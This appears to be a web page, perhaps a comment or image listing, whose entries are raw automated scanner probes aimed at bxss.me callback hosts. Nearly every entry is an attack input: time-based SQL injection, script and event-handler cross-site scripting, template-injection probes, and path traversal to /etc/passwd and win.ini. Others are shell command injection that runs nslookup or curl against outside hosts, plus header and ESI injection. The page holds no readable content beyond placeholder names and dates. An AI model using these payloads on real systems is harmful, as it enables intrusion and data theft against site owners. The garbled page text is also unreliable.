|echo fkimol$()\ vatwco\nz^xyu||a #' |echo fkimol$()\ vatwco\nz^xyu||a #|" |echo fkimol$()\ vatwco\nz^xyu||a #
12/01/2024

1

image
HfjNUlYZ
12/01/2024

8QklvZeg'; waitfor delay '0:0:15' --

image
HfjNUlYZ|echo ducmif$()\ nnildg\nz^xyu||a #' |echo ducmif$()\ nnildg\nz^xyu||a #|" |echo ducmif$()\ nnildg\nz^xyu||a #
12/01/2024

1

image
-1 OR 2+205-205-1=0+0+0+1
12/01/2024

1

image
HfjNUlYZ
12/01/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
HfjNUlYZ'&&sleep(27*1000)*sxyqux&&'
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(121).concat(71).concat(107).concat(67)+(require'socket' Socket.gethostbyname('hitnt'+'faqmsejh28466.bxss.me.')[3].to_s)+'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >HfDs(9425)</ScRiPt>

image
HfjNUlYZ
12/01/2024

bfg6698<s1﹥s2ʺs3ʹhjl6698

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
12/01/2024

1

image
sOdPqaAH<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
"+response.write(9450832*9425804)+"
12/01/2024

1

image
../../../../../../../../../../../../../../windows/win.ini
12/01/2024

1

image
file:///etc/passwd
12/01/2024

1

image
sOdPqaAH
12/01/2024

1&echo agfjtu$()\ osjvox\nz^xyu||a #' &echo agfjtu$()\ osjvox\nz^xyu||a #|" &echo agfjtu$()\ osjvox\nz^xyu||a #

image
sOdPqaAH
12/01/2024

)

image
sOdPqaAH
12/01/2024

(nslookup -q=cname hituuytrogepm1f40e.bxss.me||curl hituuytrogepm1f40e.bxss.me))

image
sOdPqaAH
12/01/2024

$(nslookup -q=cname hitfjbnrlpwbzaa325.bxss.me||curl hitfjbnrlpwbzaa325.bxss.me)

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
12/01/2024

1

image
sOdPqaAH
12/01/2024

".gethostbyname(lc("hitdk"."tgdganmb1d273.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(75).chr(105).chr(67)."

image
sOdPqaAH
12/01/2024

1

image
/etc/shells
12/01/2024

1

image
../../../../../../../../../../etc/passwd.jpg
12/01/2024

1

image
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
12/01/2024

1

image
sOdPqaAH
12/01/2024

'"()

image
sOdPqaAH
12/01/2024

-1' OR 3+320-320-1=0+0+0+1 --

image
sOdPqaAH
12/01/2024

1"&&sleep(27*1000)*andfuc&&"

image
(nslookup -q=cname hitbcyrpvxjkfc434f.bxss.me||curl hitbcyrpvxjkfc434f.bxss.me))
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1" OR 2+118-118-1=0+0+0+1 --

image
sOdPqaAH
12/01/2024

1'||sleep(27*1000)*yvjugt||'

image
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1); waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

to@example.com> bcc:0.710-25095.710.63e64.19734.2@bxss.me

image
'.print(md5(31337)).'
12/01/2024

1

image
sOdPqaAH"&&sleep(27*1000)*nadaqo&&"
12/01/2024

1

image
sOdPqaAH
12/01/2024

pk83t4pY') OR 168=(SELECT 168 FROM PG_SLEEP(15))--

image
sOdPqaAH
12/01/2024

1

image
comment
12/01/2024

1

image
sOdPqaAH
12/01/2024

<!--

image
sOdPqaAH
12/01/2024

'"()&%<zzz><ScRiPt >msqs(9863)</ScRiPt>

image
-1' OR 2+842-842-1=0+0+0+1 --
12/01/2024

1

image
if(now()=sysdate(),sleep(15),0)
12/01/2024

1

image
1'"
12/01/2024

1

image
"}dfb${98991*97996}xca
12/01/2024

1

image
"}dfb#{98991*97996}xca
12/01/2024

1

image
"}#{98991*97996*98991*97996}
12/01/2024

1

image
"}}dfb{{98991*97996}}xca
12/01/2024

1

image
"dfb__${98991*97996}__::.x
12/01/2024

1

image
'}dfb#{98991*97996}xca
12/01/2024

1

image
'}}dfb{{=98991*97996}}xca
12/01/2024

1

image
'print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
'98991*97996*98991*97996
12/01/2024

1

image
'}#{98991*97996*98991*97996}
12/01/2024

1

image
'}dfb#{xca}=123
12/01/2024

1

image
1}dfb${98991*97996}xca
12/01/2024

1

image
1}dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
1}dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
1}dfb[[${98991*97996}]]xca
12/01/2024

1

image
sOdPqaAH9223"();}]9403
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'"()&%<zzz><ScRiPt >PxGU(9219)</ScRiPt>

image
sOdPqaAH
12/01/2024

-1; waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

-1); waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

1 waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
sOdPqaAH
12/01/2024

comment

image
-1' OR 2+68-68-1=0+0+0+1 --
12/01/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
12/01/2024

1

image
T8hf9kCB')); waitfor delay '0:0:15' --
12/01/2024

1

image
1'"
12/01/2024

1

image
@@lTwtG
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
sOdPqaAH
12/01/2024

dfb__${98991*97996}__::.x

image
sOdPqaAH
12/01/2024

"}dfb{98991*97996}xca

image
sOdPqaAH<WHSCPR>IJ2RP[!+!]</WHSCPR>
12/01/2024

1

image
sOdPqaAH'"()&%<zzz><ScRiPt >8KrN(9847)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >8KrN(9967)</ScRiPt>
12/01/2024

1

image
sOdPqaAH<ScR<ScRiPt>IpT>QonP(9234)</sCr<ScRiPt>IpT>
12/01/2024

1

image
sOdPqaAH<ScRiPt >QonP(9862)</ScRiPt>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"%>dfb<%=98991*97996%>xca

image
sOdPqaAH<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9377></ScRiPt>
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
sOdPqaAH<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9328'>
12/01/2024

1

image
sOdPqaAH<body onload=QonP(9875)>
12/01/2024

1

image
sOdPqaAH<img/src=">" onerror=alert(9022)>
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}dfb#{xca}=123

image
sOdPqaAH
12/01/2024

"}}dfb{{98991*97996}}xca

image
<a HrEF=jaVaScRiPT:>
12/01/2024

1

image
sOdPqaAH
12/01/2024

')dfb@(98991*97996)xca

image
sOdPqaAH
12/01/2024

'}dfb{{"abc"|title}}xca

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

'}#{98991*97996*98991*97996}

image
sOdPqaAH
12/01/2024

1}dfb${98991*97996}xca

image
sOdPqaAH
12/01/2024

1}dfb{#98991*97996}xca

image
sOdPqaAH
12/01/2024

1}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
sOdPqaAH
12/01/2024

1<W1TVTS>SCHEW[!+!]</W1TVTS>

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1<ScRiPt >dLlM(9934)</ScRiPt>

image
sOdPqaAH
12/01/2024

1<img src=//xss.bxss.me/t/dot.gif onload=dLlM(9612)>

image
sOdPqaAH
12/01/2024

1<aXBLxwK<

image
HfjNUlYZ
12/01/2024

1BF7XZR0seO

image
HfjNUlYZ
12/01/2024

<th:t="${dfb}#foreach

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
HfjNUlYZ
12/01/2024

-5 OR 834=(SELECT 834 FROM PG_SLEEP(15))--

image
HfjNUlYZ
12/01/2024

q9gKalEO')) OR 941=(SELECT 941 FROM PG_SLEEP(15))--

image
HfjNUlYZ
12/01/2024

dfb{{=98991*97996}}xca

image
-1" OR 2+562-562-1=0+0+0+1 --
12/01/2024

1

image
if(now()=sysdate(),sleep(15),0)
12/01/2024

1

image
qvTF7mpu'; waitfor delay '0:0:15' --
12/01/2024

1

image
NXNlYVNXRHg=
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb#set($x=98991*97996)${x}xca

image
4DVaYUDk')); waitfor delay '0:0:15' --
12/01/2024

1

image
y0U2DVOZ' OR 782=(SELECT 782 FROM PG_SLEEP(15))--
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'+response.write(9391539*9907559)+'

image
HfjNUlYZ
12/01/2024

file:///etc/passwd

image
HfjNUlYZ
12/01/2024

Http://bxss.me/t/fit.txt

image
HfjNUlYZ
12/01/2024

(nslookup -q=cname hitxmaqdysxhjea7d4.bxss.me||curl hitxmaqdysxhjea7d4.bxss.me))

image
HfjNUlYZ
12/01/2024

http://bxss.me/t/fit.txt?.jpg

image
HfjNUlYZ
12/01/2024

&nslookup -q=cname hitihdatomwii7d344.bxss.me&'\"`0&nslookup -q=cname hitihdatomwii7d344.bxss.me&`'

image
HfjNUlYZ
12/01/2024

/etc/shells

image
HfjNUlYZ
12/01/2024

c:/windows/win.ini

image
HfjNUlYZ
12/01/2024

&(nslookup -q=cname hitfcgnmprmnl5f384.bxss.me||curl hitfcgnmprmnl5f384.bxss.me)&'\"`0&(nslookup -q=cname hitfcgnmprmnl5f384.bxss.me||curl hitfcgnmprmnl5f384.bxss.me)&`'

image
HfjNUlYZ
12/01/2024

)

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
|(nslookup -q=cname hitbodssgqrin5a983.bxss.me||curl hitbodssgqrin5a983.bxss.me)
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1"||sleep(27*1000)*dilnyx||"

image
HfjNUlYZ"||sleep(27*1000)*pcgzal||"
12/01/2024

1

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
HfjNUlYZ
12/01/2024

${@print(md5(31337))}

image
HfjNUlYZ
12/01/2024

${@print(md5(31337))}\

image
comment
12/01/2024

1

image
xfs.bxss.me
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >60n1(9484)</ScRiPt>

image
HfjNUlYZ
12/01/2024

1<script>3cHj(9962)</script>

image
HfjNUlYZ
12/01/2024

bfg9869<s1﹥s2ʺs3ʹhjl9869

image
HfjNUlYZ
12/01/2024

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9850'>

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img src=xyz OnErRor=3cHj(9898)>

image
HfjNUlYZ
12/01/2024

1\u003CScRiPt\3cHj(9017)\u003C/sCripT\u003E

image
HfjNUlYZ
12/01/2024

1&lt;ScRiPt&gt;3cHj(9367)&lt;/sCripT&gt;

image
<th:t="${dfb}#foreach
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
WmhvNmFZZWk=
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"+response.write(9858420*9939726)+"

image
response.write(9079377*9406867)
12/01/2024

1

image
HfjNUlYZ
12/01/2024

file:///etc/passwd

image
../../../../../../../../../../../../../../etc/passwd
12/01/2024

1

image
HfjNUlYZ
12/01/2024

echo taygyb$()\ lezjgt\nz^xyu||a #' &echo taygyb$()\ lezjgt\nz^xyu||a #|" &echo taygyb$()\ lezjgt\nz^xyu||a #

image
HfjNUlYZ<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
${9999817+9999384}
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
&(nslookup -q=cname hitjuxtdotjzaa6d28.bxss.me||curl hitjuxtdotjzaa6d28.bxss.me)&'\"`0&(nslookup -q=cname hitjuxtdotjzaa6d28.bxss.me||curl hitjuxtdotjzaa6d28.bxss.me)&`'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

http://bxss.me/t/fit.txt?.jpg

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

bxss.me

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
HfjNUlYZ
12/01/2024

';print(md5(31337));$a='

image
HfjNUlYZ
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
HfjNUlYZ
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
HfjNUlYZ
12/01/2024

'"()

image
HfjNUlYZ
12/01/2024

'.print(md5(31337)).'

image
";print(md5(31337));$a="
12/01/2024

1

image
HfjNUlYZ
12/01/2024

7ddiraWu') OR 736=(SELECT 736 FROM PG_SLEEP(15))--

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
tyYjpLk4')); waitfor delay '0:0:15' --
12/01/2024

1

image
EZX78d8b') OR 464=(SELECT 464 FROM PG_SLEEP(15))--
12/01/2024

1

image
@@mMqiy
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

19730"();}]9906

image
HfjNUlYZ
12/01/2024

%31%39%31%39%38%22%28%29%3B%7D%5D%39%34%39%35

image
HfjNUlYZ9805078
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
dfb${98991*97996}xca
12/01/2024

1

image
dfb@(98991*97996)xca
12/01/2024

1

image
dfb{{"abc"|title}}xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
HfjNUlYZ</script><script>VNXc(9609)</script>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1 OR 2+400-400-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}

image
XcwJRDFY
12/01/2024

to@example.com> bcc:0.706-6292.706.97d92.19734.2@bxss.me

image
XcwJRDFY
12/01/2024

<th:t="${dfb}#foreach

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
'"()&%<zzz><ScRiPt >OjQ1(9013)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ9365168
12/01/2024

1

image
HfjNUlYZ
12/01/2024

19754006

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

"}}dfb{{98991*97996}}xca

image
HfjNUlYZ
12/01/2024

"}dfb{98991*97996}xca

image
HfjNUlYZ
12/01/2024

"}dfb${98991*97996}xca

image
HfjNUlYZ
12/01/2024

"}dfb{{"abc"|title}}xca

image
HfjNUlYZ
12/01/2024

"}dfb[[${98991*97996}]]xca

image
HfjNUlYZ
12/01/2024

'%>dfb<%=98991*97996%>xca

image
HfjNUlYZ
12/01/2024

'98991*97996*98991*97996

image
HfjNUlYZ
12/01/2024

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

image
HfjNUlYZ
12/01/2024

'dfb__${98991*97996}__::.x

image
HfjNUlYZ
12/01/2024

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

1}dfb#{98991*97996}xca

image
HfjNUlYZ
12/01/2024

1)dfb@(98991*97996)xca

image
HfjNUlYZ
12/01/2024

198991*97996*98991*97996

image
HfjNUlYZ
12/01/2024

1dfb__${98991*97996}__::.x

image
HfjNUlYZ
12/01/2024

1<ScRiPt >keuE(9811)</ScRiPt>

image
HfjNUlYZ
12/01/2024

1<input autofocus onfocus=keuE(9926)>

image
HfjNUlYZ
12/01/2024

<a HrEF=http://xss.bxss.me></a>

image
HfjNUlYZ
12/01/2024

<a HrEF=jaVaScRiPT:>

image
HfjNUlYZ
12/01/2024

1iCy09 <ScRiPt >keuE(9288)</ScRiPt>

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
XcwJRDFY
12/01/2024

file:///etc/passwd

image
../../../../../../../../../../../../../../windows/win.ini
12/01/2024

1

image
file:///etc/passwd
12/01/2024

1

image
^(#$!@#$)(()))******
12/01/2024

1

image
XcwJRDFY
12/01/2024

8kfgTruZ

image
XcwJRDFY
12/01/2024

/etc/shells

image
XcwJRDFY
12/01/2024

|(nslookup -q=cname hitszgrlbhrrpa3b1a.bxss.me||curl hitszgrlbhrrpa3b1a.bxss.me)

image
XcwJRDFY
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
&echo vbzxaj$()\ mgjhig\nz^xyu||a #' &echo vbzxaj$()\ mgjhig\nz^xyu||a #|" &echo vbzxaj$()\ mgjhig\nz^xyu||a #
12/01/2024

1

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
XcwJRDFY&echo uisrlc$()\ dqsywz\nz^xyu||a #' &echo uisrlc$()\ dqsywz\nz^xyu||a #|" &echo uisrlc$()\ dqsywz\nz^xyu||a #
12/01/2024

1

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1"&&sleep(27*1000)*bdwtwm&&"

image
XcwJRDFY
12/01/2024

".gethostbyname(lc("hitko"."euzsusuj35b6d.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(88).chr(117).chr(78)."

image
(nslookup -q=cname hiteuabwawmeoef65e.bxss.me||curl hiteuabwawmeoef65e.bxss.me))
12/01/2024

1

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
bxss.me
12/01/2024

1

image
'.gethostbyname(lc('hitam'.'uoftufypdc4b0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(87).chr(106).chr(90).'
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'||sleep(27*1000)*lyycet||'

image
$(nslookup -q=cname hitbirscaeglh3ba8c.bxss.me||curl hitbirscaeglh3ba8c.bxss.me)
12/01/2024

1

image
XcwJRDFY
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
".gethostbyname(lc("hitnv"."nbkophzy513d8.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(72).chr(103).chr(77)."
12/01/2024

1

image
XcwJRDFY
12/01/2024

1"||sleep(27*1000)*fohkcb||"

image
&nslookup -q=cname hitowudbspivo05aa6.bxss.me&'\"`0&nslookup -q=cname hitowudbspivo05aa6.bxss.me&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1; waitfor delay '0:0:15' --

image
&(nslookup -q=cname hitrfwmlbpbyx0df9b.bxss.me||curl hitrfwmlbpbyx0df9b.bxss.me)&'\"`0&(nslookup -q=cname hitrfwmlbpbyx0df9b.bxss.me||curl hitrfwmlbpbyx0df9b.bxss.me)&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1); waitfor delay '0:0:15' --

image
|(nslookup -q=cname hitsiustiiyfeb4062.bxss.me||curl hitsiustiiyfeb4062.bxss.me)
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1)); waitfor delay '0:0:15' --

image
`(nslookup -q=cname hityvzoqakscu9ff3b.bxss.me||curl hityvzoqakscu9ff3b.bxss.me)`
12/01/2024

1

image
XcwJRDFY"&&sleep(27*1000)*mbvqhk&&"
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1)) OR 879=(SELECT 879 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

F0tL7cQg')) OR 201=(SELECT 201 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

';print(md5(31337));$a='

image
XcwJRDFY
12/01/2024

bxss.me/t/xss.html?%00

image
XcwJRDFY
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}\

image
HttP://bxss.me/t/xss.html?%00
12/01/2024

1

image
XcwJRDFY
12/01/2024

'+'A'.concat(70-3).concat(22*4).concat(119).concat(78).concat(114).concat(74)+(require'socket' Socket.gethostbyname('hitto'+'tppsmhjr64aac.bxss.me.')[3].to_s)+'

image
XcwJRDFY
12/01/2024

comment

image
XcwJRDFY
12/01/2024

xfs.bxss.me

image
XcwJRDFY
12/01/2024

'"

image
1 waitfor delay '0:0:15' --
12/01/2024

1

image
WUaoc4g6'; waitfor delay '0:0:15' --
12/01/2024

1

image
edIVtlLT')); waitfor delay '0:0:15' --
12/01/2024

1

image
nWW7Gcw6' OR 153=(SELECT 153 FROM PG_SLEEP(15))--
12/01/2024

1

image
@@YkXja
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

<th:t="${dfb}#foreach

image
XcwJRDFY
12/01/2024

dfb__${98991*97996}__::.x

image
XcwJRDFY
12/01/2024

19785"();}]9170

image
XcwJRDFY
12/01/2024

%31%39%34%34%30%22%28%29%3B%7D%5D%39%32%33%36

image
XcwJRDFY9282464
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >fvYo(9417)</ScRiPt>

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
XcwJRDFY
12/01/2024

&nslookup -q=cname hitslvimsgcmd1839c.bxss.me&'\"`0&nslookup -q=cname hitslvimsgcmd1839c.bxss.me&`'

image
../../../../../../../../../../../../../../etc/passwd
12/01/2024

1

image
${9999463+9999676}
12/01/2024

1

image
XcwJRDFY
12/01/2024

|(nslookup -q=cname hitafpbfqvzqo0bd1f.bxss.me||curl hitafpbfqvzqo0bd1f.bxss.me)

image
XcwJRDFY|echo kkxqwi$()\ lhehrx\nz^xyu||a #' |echo kkxqwi$()\ lhehrx\nz^xyu||a #|" |echo kkxqwi$()\ lhehrx\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY
12/01/2024

Http://bxss.me/t/fit.txt

image
&nslookup -q=cname hitakeupkexkk8543e.bxss.me&'\"`0&nslookup -q=cname hitakeupkexkk8543e.bxss.me&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1' OR 2+927-927-1=0+0+0+1 --

image
XcwJRDFY'||sleep(27*1000)*fgovgw||'
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(114).concat(90).concat(99).concat(87)+(require'socket' Socket.gethostbyname('hitpu'+'ehlzssfl25b2a.bxss.me.')[3].to_s)+'
12/01/2024

1

image
";print(md5(31337));$a="
12/01/2024

1

image
XcwJRDFY
12/01/2024

comment/.

image
XcwJRDFY
12/01/2024

1

image
comment
12/01/2024

1

image
-1' OR 2+65-65-1=0+0+0+1 --
12/01/2024

1

image
XcwJRDFY
12/01/2024

<!--

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

1<body onload=ebK6(9704)>

image
XcwJRDFY
12/01/2024

dfb[[${98991*97996}]]xca

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

dfb__${98991*97996}__::.x

image
HfjNUlYZ
12/01/2024

1<img src=//xss.bxss.me/t/dot.gif onload=ebK6(9555)>

image
XcwJRDFY
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

1<img/src=">" onerror=alert(9650)>

image
XcwJRDFY'"()&%<zzz><ScRiPt >FBLJ(9715)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<WDWPGI>XARQK[!+!]</WDWPGI>

image
<th:t="${dfb}#foreach
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >I7qC(9536)</ScRiPt>

image
HfjNUlYZ
12/01/2024

19824342

image
XcwJRDFY'"()&%<zzz><ScRiPt >LMJS(9045)</ScRiPt>
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >pVxZ(9642)</ScRiPt>
12/01/2024

1

image
"%}dfb{{98991*97996}}xca
12/01/2024

1

image
"}dfb{98991*97996}xca
12/01/2024

1

image
"}dfb#{98991*97996}xca
12/01/2024

1

image
"}#{98991*97996*98991*97996}
12/01/2024

1

image
'}dfb{@98991*97996}xca
12/01/2024

1

image
'}}dfb{{=98991*97996}}xca
12/01/2024

1

image
'}}}dfb{{{this}}}xca
12/01/2024

1

image
'}#{98991*97996*98991*97996}
12/01/2024

1

image
'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
1print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY
12/01/2024

"+response.write(9850563*9358508)+"

image
response.write(9281102*9199099)
12/01/2024

1

image
XcwJRDFY
12/01/2024

|echo lugcsm$()\ dvidox\nz^xyu||a #' |echo lugcsm$()\ dvidox\nz^xyu||a #|" |echo lugcsm$()\ dvidox\nz^xyu||a #

image
XcwJRDFY
12/01/2024

&nslookup -q=cname hitdrrdktzbxn3e424.bxss.me&'\"`0&nslookup -q=cname hitdrrdktzbxn3e424.bxss.me&`'

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
XcwJRDFY
12/01/2024

&(nslookup -q=cname hitnyiveeyayd579b6.bxss.me||curl hitnyiveeyayd579b6.bxss.me)&'\"`0&(nslookup -q=cname hitnyiveeyayd579b6.bxss.me||curl hitnyiveeyayd579b6.bxss.me)&`'

image
XcwJRDFY
12/01/2024

-1); waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

iXYxbQof') OR 925=(SELECT 925 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

/etc/shells

image
cwRzXhFx')); waitfor delay '0:0:15' --
12/01/2024

1

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}

image
XcwJRDFY
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(119).concat(89).concat(119).concat(81)+(require"socket" Socket.gethostbyname("hitan"+"wtcgzgxe6c781.bxss.me.")[3].to_s)+"

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}\

image
XcwJRDFY
12/01/2024

bxss.me/t/xss.html?%00

image
XcwJRDFY
12/01/2024

bfg5409<s1﹥s2ʺs3ʹhjl5409

image
XcwJRDFY'"()&%<zzz><ScRiPt >Vynf(9331)</ScRiPt>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
XcwJRDFY
12/01/2024

$(nslookup -q=cname hitxmsthymzda854ac.bxss.me||curl hitxmsthymzda854ac.bxss.me)

image
XcwJRDFY
12/01/2024

./1

image
XcwJRDFY
12/01/2024

-1; waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../../proc/version

image
XcwJRDFY
12/01/2024

&nslookup -q=cname hityubaovruuz9039e.bxss.me&'\"`0&nslookup -q=cname hityubaovruuz9039e.bxss.me&`'

image
XcwJRDFY
12/01/2024

1 waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

/etc/shells

image
XcwJRDFY
12/01/2024

)

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
